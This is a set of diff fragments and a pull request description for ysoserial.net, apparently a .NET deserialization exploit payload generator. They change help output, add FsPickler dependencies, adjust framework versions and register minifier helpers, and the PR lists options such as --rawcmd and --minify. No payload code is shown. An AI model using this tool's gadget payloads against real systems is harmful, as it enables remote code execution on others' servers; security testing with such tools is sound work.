                             Generator gg = (Generator)container.Unwrap();
                             Console.WriteLine("\t" + gg.Name() + " (" + gg.Description() + ")");
                             Console.WriteLine("\t\tFormatters:");
+
+                            Console.WriteLine("\t\t\t" + string.Join(", ", gg.SupportedFormatters()) + "\n");
+                            /*
                             foreach (string f in gg.SupportedFormatters().ToArray())
                             {
                                 Console.WriteLine("\t\t\t" + f);
                             }
+                            */
                         }
                     }
                     catch

--- a/ysoserial/packages.config
+++ b/ysoserial/packages.config
@@ -1,6 +1,10 @@
 ﻿<?xml version="1.0" encoding="utf-8"?>
 <packages>
   <package id="fastJSON" version="2.1.27" targetFramework="net452" />
+  <package id="FSharp.Core" version="3.1.2" targetFramework="net48" />
+  <package id="FsPickler" version="4.6" targetFramework="net461" />
+  <package id="FsPickler.CSharp" version="4.6" targetFramework="net461" />
+  <package id="FsPickler.Json" version="4.6" targetFramework="net461" />
   <package id="Microsoft.IdentityModel" version="7.0.0" targetFramework="net452" />
   <package id="NDesk.Options" version="0.2.1" targetFramework="net452" />
   <package id="Newtonsoft.Json" version="10.0.3" targetFramework="net452" />

--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -9,9 +9,25 @@
     <AppDesignerFolder>Properties</AppDesignerFolder>
     <RootNamespace>ysoserial</RootNamespace>
     <AssemblyName>ysoserial</AssemblyName>
-    <TargetFrameworkVersion>v4.5.2</TargetFrameworkVersion>
+    <TargetFrameworkVersion>v4.6.1</TargetFrameworkVersion>
     <FileAlignment>512</FileAlignment>
     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
+    <TargetFrameworkProfile />
+    <PublishUrl>publish\</PublishUrl>
+    <Install>true</Install>
+    <InstallFrom>Disk</InstallFrom>
+    <UpdateEnabled>false</UpdateEnabled>
+    <UpdateMode>Foreground</UpdateMode>
+    <UpdateInterval>7</UpdateInterval>
+    <UpdateIntervalUnits>Days</UpdateIntervalUnits>
+    <UpdatePeriodically>false</UpdatePeriodically>
+    <UpdateRequired>false</UpdateRequired>
+    <MapFileExtensions>true</MapFileExtensions>
+    <ApplicationRevision>0</ApplicationRevision>
+    <ApplicationVersion>1.0.0.%2a</ApplicationVersion>
+    <IsWebBootstrapper>false</IsWebBootstrapper>
+    <UseApplicationTrust>false</UseApplicationTrust>
+    <BootstrapperEnabled>true</BootstrapperEnabled>
   </PropertyGroup>
   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
     <PlatformTarget>AnyCPU</PlatformTarget>
@@ -35,6 +51,22 @@
   <ItemGroup>
     <Reference Include="fastjson, Version=2.1.0.0, Culture=neutral, PublicKeyToken=6b75a806b86095cd, processorArchitecture=MSIL">
       <HintPath>..\packages\fastJSON.2.1.27\lib\net40\fastjson.dll</HintPath>
+      <Private>True</Private>
+    </Reference>
+    <Reference Include="FSharp.Core, Version=4.3.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>..\packages\FSharp.Core.3.1.2\lib\net40\FSharp.Core.dll</HintPath>
+      <Private>True</Private>
+    </Reference>
+    <Reference Include="FsPickler, Version=4.6.0.0, Culture=neutral, processorArchitecture=MSIL">
+      <HintPath>..\packages\FsPickler.4.6\lib\net45\FsPickler.dll</HintPath>
+      <Private>True</Private>
+    </Reference>
+    <Reference Include="FsPickler.CSharp, Version=4.6.0.0, Culture=neutral, processorArchitecture=MSIL">
+      <HintPath>..\packages\FsPickler.CSharp.4.6\lib\net45\FsPickler.CSharp.dll</HintPath>
+      <Private>True</Private>
+    </Reference>
+    <Reference Include="FsPickler.Json, Version=4.6.0.0, Culture=neutral, processorArchitecture=MSIL">
+      <HintPath>..\packages\FsPickler.Json.4.6\lib\net45\FsPickler.Json.dll</HintPath>
       <Private>True</Private>
     </Reference>
     <Reference Include="microsoft.identitymodel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
@@ -82,7 +114,9 @@
     </Reference>
   </ItemGroup>
   <ItemGroup>
-    <Compile Include="DevTest\SerializersHelper.cs" />
+    <Compile Include="Helpers\BFMinifier.cs" />
+    <Compile Include="Helpers\CommandArgSplitter.cs" />
+    <Compile Include="Helpers\DevTest\SerializersHelper.cs" />
     <Compile Include="ExploitClass.cs" />
     <Compile Include="Generators\ActivitySurrogateDisableTypeCheck.cs" />
     <Compile Include="Generators\ActivitySurrogateSelectorFromFileGenerator.cs" />
@@ -96,6 +130,9 @@
     <Compile Include="Generators\TypeConfuseDelegateMonoGenerator.cs" />
     <Compile Include="Generators\WindowsClaimsIdentityGenerator.cs" />
     <Compile Include="Generators\WindowsIdentityGenerator.cs" />
+    <Compile Include="Helpers\JSONMinifier.cs" />
+    <Compile Include="Helpers\XMLMinifier.cs" />
+    <Compile Include="Helpers\YamlDotNet.cs" />
     <Compile Include="Plugins\ActivatorUrlPlugin.cs" />
     <Compile Include="Plugins\AltserializationPlugin.cs" />
     <Compile Include="Plugins\ApplicationTrustPlugin.cs" />
@@ -116,6 +153,18 @@
   </ItemGroup>
   <ItemGroup>
     <Folder Include="dlls\" />
+  </ItemGroup>
+  <ItemGroup>
+    <BootstrapperPackage Include=".NETFramework,Version=v4.5.2">
+      <Visible>False</Visible>
+      <ProductName>Microsoft .NET Framework 4.5.2 %28x86 and x64%29</ProductName>
+      <Install>true</Install>
+    </BootstrapperPackage>
+    <BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
+      <Visible>False</Visible>
+      <ProductName>.NET Framework 3.5 SP1</ProductName>
+      <Install>false</Install>
+    </BootstrapperPackage>
   </ItemGroup>
   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
   <!-- To modify your build process, add your task inside one of the targets below and uncomment it. 

--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -9,7 +9,7 @@
     <AppDesignerFolder>Properties</AppDesignerFolder>
     <RootNamespace>ysoserial</RootNamespace>
     <AssemblyName>ysoserial</AssemblyName>
-    <TargetFrameworkVersion>v4.5.1</TargetFrameworkVersion>
+    <TargetFrameworkVersion>v4.5.2</TargetFrameworkVersion>
     <FileAlignment>512</FileAlignment>
     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
     <TargetFrameworkProfile />

--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -9,7 +9,7 @@
     <AppDesignerFolder>Properties</AppDesignerFolder>
     <RootNamespace>ysoserial</RootNamespace>
     <AssemblyName>ysoserial</AssemblyName>
-    <TargetFrameworkVersion>v4.6.1</TargetFrameworkVersion>
+    <TargetFrameworkVersion>v4.5.1</TargetFrameworkVersion>
     <FileAlignment>512</FileAlignment>
     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
     <TargetFrameworkProfile />


### PR DESCRIPTION
New options:
--rawcmd
--minify (currently working on XML, JSON, and YAML)
--searchformatter

FsPickler example has been added.

Command encoding problem in XML and JSON should be resolved.

Help page shows all formatters in one line to make it more readable.

Readme has been updated.